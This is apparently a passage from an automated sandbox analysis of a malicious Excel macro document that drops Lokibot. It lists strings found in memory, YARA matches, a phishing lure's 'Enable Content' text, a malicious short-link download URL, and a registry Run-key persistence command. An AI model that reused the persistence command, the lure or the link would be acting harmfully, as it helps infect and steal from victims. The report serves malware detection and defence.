                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://www.chambersign.org1
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
                Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
                Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://www.firmaprofesional.com0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: RegAsm.exeString found in binary or memory: http://www.ibsensoftware.com/
                Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: powershell.exe, 00000008.00000002.2134654234.000000000024E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2134654234.000000000024E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                Source: powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                Source: powershell.exe, 00000006.00000002.2106986804.000000001D1E4000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
                Source: powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
                Source: powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                Source: powershell.exe, 00000006.00000003.2094858856.000000001D2AE000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
                Source: 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
                Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly
                Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/
                Source: powershell.exe, 00000006.00000002.2098023844.00000000001D0000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2099196904.0000000002BD1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2099216608.0000000002BFF000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/qjdJoz4
                Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/qjdJoz4PE
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
                Source: Document image extraction number: 0Screenshot OCR: document is protected! To view this content, please click "Enable Editing" from the yellow bar and
                Source: Document image extraction number: 0Screenshot OCR: Enable Content"
                Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
                Source: Document image extraction number: 1Screenshot OCR: document is protected! To view this content, please click "Enable Editing" from the yellow bar and
                Source: Document image extraction number: 1Screenshot OCR: Enable Content"
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: 6Cprm97UTl.xlsInitial sample: EXEC
                Found abnormal large hidden Excel 4.0 Macro sheetShow sources
                Source: 6Cprm97UTl.xlsInitial sample: Sheet size: 5194
                Found obfuscated Excel 4.0 MacroShow sources
                Source: 6Cprm97UTl.xlsInitial sample: High usage of CHAR() function: 16
                Powershell drops PE fileShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\12.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\12.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D5BC0 CreateProcessAsUserW,15_2_009D5BC0
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_003130D111_2_003130D1
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00318D2011_2_00318D20
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_003169B011_2_003169B0
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031824011_2_00318240
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00314EF111_2_00314EF1
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031D3B811_2_0031D3B8
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_003197C211_2_003197C2
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00313BC911_2_00313BC9
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00318D1011_2_00318D10
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031DEC811_2_0031DEC8
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031D3A811_2_0031D3A8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_005030D115_2_005030D1
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050D09015_2_0050D090
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_005069B015_2_005069B0
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050EBD015_2_0050EBD0
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00503BC915_2_00503BC9
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00508D2015_2_00508D20
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050852015_2_00508520
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050F5B815_2_0050F5B8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00504EF115_2_00504EF1
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_005097C215_2_005097C2
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050D08015_2_0050D080
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00508D1015_2_00508D10
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D24E815_2_009D24E8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D2C1815_2_009D2C18
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D0A2815_2_009D0A28
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D4A2015_2_009D4A20
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D731215_2_009D7312
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D549015_2_009D5490
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D24D815_2_009D24D8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D0A1815_2_009D0A18
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D2C0815_2_009D2C08
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D3D8015_2_009D3D80
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D61C815_2_009D61C8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D41F815_2_009D41F8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D41E815_2_009D41E8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D7F4015_2_009D7F40
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_004930D116_2_004930D1
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_004969B016_2_004969B0
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_00494EF116_2_00494EF1
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_00493BC916_2_00493BC9
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00253DFE17_2_00253DFE
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_0040549C17_2_0040549C
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_004029D417_2_004029D4
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_004030D118_2_004030D1
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_0040D09018_2_0040D090
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_004069B018_2_004069B0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00403BC918_2_00403BC9
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_0040851518_2_00408515
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00408D2018_2_00408D20
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00404EF118_2_00404EF1
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_004097C218_2_004097C2
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_0040D08018_2_0040D080
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_0040DBA018_2_0040DBA0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00408D1018_2_00408D10
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D4004818_2_00D40048
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D4381818_2_00D43818
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D45DA018_2_00D45DA0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D41D5818_2_00D41D58
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D4864018_2_00D48640
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D40A3018_2_00D40A30
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D43F4818_2_00D43F48
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D474F818_2_00D474F8
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D450B018_2_00D450B0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D4000618_2_00D40006
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D4380818_2_00D43808
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D4683818_2_00D46838
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D41D4918_2_00D41D49
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D4551718_2_00D45517
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D4552818_2_00D45528
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D4927018_2_00D49270
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D43F3918_2_00D43F39
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 19_2_01233DFE19_2_01233DFE
                Source: 6Cprm97UTl.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RegAsm.exe 5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
                Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
